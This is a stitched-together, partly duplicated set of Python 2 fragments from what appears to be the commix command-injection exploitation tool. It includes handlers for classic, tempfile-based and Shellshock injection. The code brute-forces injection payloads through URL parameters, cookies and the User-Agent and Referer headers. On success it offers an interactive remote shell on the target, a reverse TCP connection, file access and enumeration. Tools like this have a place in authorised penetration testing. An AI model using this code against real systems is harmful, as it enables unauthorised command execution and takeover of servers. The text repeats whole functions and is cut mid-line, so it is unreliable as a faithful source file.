file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower() if file_access_again in settings.CHOISE_YES: print "" tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Check if defined single cmd. if menu.options.os_cmd: cmd = menu.options.os_cmd check_how_long, output = tb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Exploirt injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) sys.exit(0) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd == "?": menu.shell_options() continue elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: # The main command injection exploitation. check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Exploirt injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) print "" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass break if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def input_cmd(http_request_method, url, vuln_parameter, ip_src, technique): # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" while True: try: cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "quit" or cmd.lower() == "back": print "" os._exit(0) elif cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "os_shell": print Fore.YELLOW + "(^) Warning: You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n" elif cmd.lower() == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. lhost, lport = reverse_tcp.configure_reverse_tcp() while True: if lhost and lport in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(lhost) else: cmd = reverse_tcp.reverse_tcp_options(lhost, lport) result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True break # Command execution results. cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src) if menu.options.verbose: print "" print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL else: # Command execution results. cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src) except KeyboardInterrupt: print "" os._exit(0) except: print "" os._exit(0) elif gotshell in settings.CHOISE_NO: print "" os._exit(0) elif gotshell in settings.CHOISE_QUIT: print "" os._exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass
def cb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True is_encoded= False export_injection_info = False injection_type = "Results-based Command Injection" technique = "classic injection technique" sys.stdout.write("(*) Testing the "+ technique + "... ") sys.stdout.flush() i = 0 # Calculate all possible combinations total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACES: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.decision(separator, TAG, randv1, randv2) # Define prefixes & suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = urllib.unquote(payload) payload = base64.b64encode(payload) else: if separator == " " : payload = re.sub(" ", "%20", payload) else: payload = re.sub(" ", whitespace, payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = cb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) response = cb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = cb_injector.injection_test(payload, http_request_method, url) # Evaluate test results. shell = cb_injector.injection_test_results(response, TAG, randvcalc) if not menu.options.verbose: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent)+"%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent)+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.upload_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL # Check for any enumeration options. cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell) # Check for any system file access options. cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell) # Check if defined single cmd. if menu.options.os_cmd: cb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True break else: pass else: # Command execution results. response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Evaluate injection results. shell = cb_injector.injection_results(response, TAG) if shell: shell = "".join(str(p) for p in shell) html_parser = HTMLParser.HTMLParser() shell = html_parser.unescape(shell) if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: if menu.options.verbose: sys.stdout.write("\r(*) Continue testing the "+ technique +"... ") sys.stdout.flush() break elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
# Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if menu.options.verbose: print "" if go_back == True: break gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: cmd = raw_input("Shell > ") cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass
def input_cmd(http_request_method, url, vuln_parameter, ip_src, technique): # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break gotshell = raw_input( "\n(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "quit" or cmd.lower() == "back": print "" os._exit(0) elif cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "os_shell": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n" elif cmd.lower() == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. lhost, lport = reverse_tcp.configure_reverse_tcp() while True: if lhost and lport in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options( lhost) else: cmd = reverse_tcp.reverse_tcp_options( lhost, lport) result = checks.check_reverse_tcp_options( cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True break # Command execution results. cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src) if menu.options.verbose: print "" print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL else: # Command execution results. cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src) except KeyboardInterrupt: print "" os._exit(0) except: print "" os._exit(0) elif gotshell in settings.CHOISE_NO: print "" os._exit(0) elif gotshell in settings.CHOISE_QUIT: print "" os._exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n" pass
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" sys.stdout.write("(*) Testing the " + technique + "... ") sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) header = {check_header: payload} request = urllib2.Request(url, None, header) response = urllib2.urlopen(request) if not menu.options.verbose: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL elif cve in response.info(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent) + "%" sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vuln_parameter = "HTTP Header" vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload) logs.update_payload(filename, counter, payload) if cve in response.info(): no_result = False print Style.BRIGHT + "\n(!) The (" + check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title( ) + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL # Enumeration options. if settings.ENUMERATION_DONE == True: print "" while True: enumerate_again = raw_input( "(?) Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOISE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( "(?) Do you want to access files again? [Y/n/q] > " ).lower() if file_access_again in settings.CHOISE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL sys.exit(0) else: # Pseudo-Terminal shell go_back = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: print "" gotshell = raw_input( "(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower( ) in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: shell = cmd_exec( url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise except: print "" sys.exit(0) elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL continue break else: continue except urllib2.HTTPError, err: print "\n" + Fore.YELLOW + "(^) Warning: " + str(err) + Style.RESET_ALL
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "Semiblind-based Command Injection" technique = "tempfile-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = menu.options.maxlen # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive resutls. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) # The output file for file-based injection technique. OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" alter_shell = menu.options.alter_shell tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: # Tempfile-based decision payload (check if host is vulnerable). if alter_shell : payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) else: payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Check if defined "--verbose" option. if menu.options.verbose: if separator == ";" or separator == "&&" or separator == "||": print Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url) # Injection percentage calculation percent = ((num_of_chars * 100) / total) if percent == 100 and no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay): # Time relative false positive fixation. randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))" output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell) if str(output) == str(randvcalc): if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break else: percent = str(percent)+"%" if not menu.options.verbose: sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: percent = ((num_of_chars * 100) / total) if percent == 100: if no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() else: percent = "" break else: percent = str(percent)+"%" #Print logs notification message percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() print "" logs.logs_notification(filename) raise else: percent = str(percent)+"%" break # Yaw, got shellz! # Do some magic tricks! if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay) : if len(TAG) == output_length: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.upload_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Check for any enumeration options. tfb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) # Check for any enumeration options. tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) # Check if defined single cmd. if menu.options.os_cmd: tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd == "?": menu.shell_options() continue elif cmd.lower() == "quit": logs.logs_notification(filename) sys.exit(0) elif cmd.lower() == "back": go_back = True break else: pass else: # The main command injection exploitation. check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) if menu.options.verbose: print "" if output != "" and check_how_long != 0 : print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n" else: print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: break if menu.options.verbose: sys.stdout.write("\r(*) Continue testing the "+ technique +"... ") sys.stdout.flush() else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass break if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "Semiblind-based Command Injection" technique = "tempfile-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = menu.options.maxlen # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive resutls. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) # The output file for file-based injection technique. OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" alter_shell = menu.options.alter_shell tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: # Tempfile-based decision payload (check if host is vulnerable). if alter_shell : payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) else: payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url) # Injection percentage calculation percent = ((num_of_chars * 100) / total) if percent == 100 and no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay): # Time relative false positive fixation. randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))" output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell) if str(output) == str(randvcalc): if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break else: percent = str(percent)+"%" if not menu.options.verbose: sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: percent = ((num_of_chars * 100) / total) if percent == 100: if no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() else: percent = "" break else: percent = str(percent)+"%" #Print logs notification message percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() print "" logs.logs_notification(filename) raise else: percent = str(percent)+"%" break # Yaw, got shellz! # Do some magic tricks! if (url_time_response <= 1 and how_long >= delay) or \ (url_time_response >= 2 and how_long > delay) : if len(TAG) == output_length: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.upload_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + 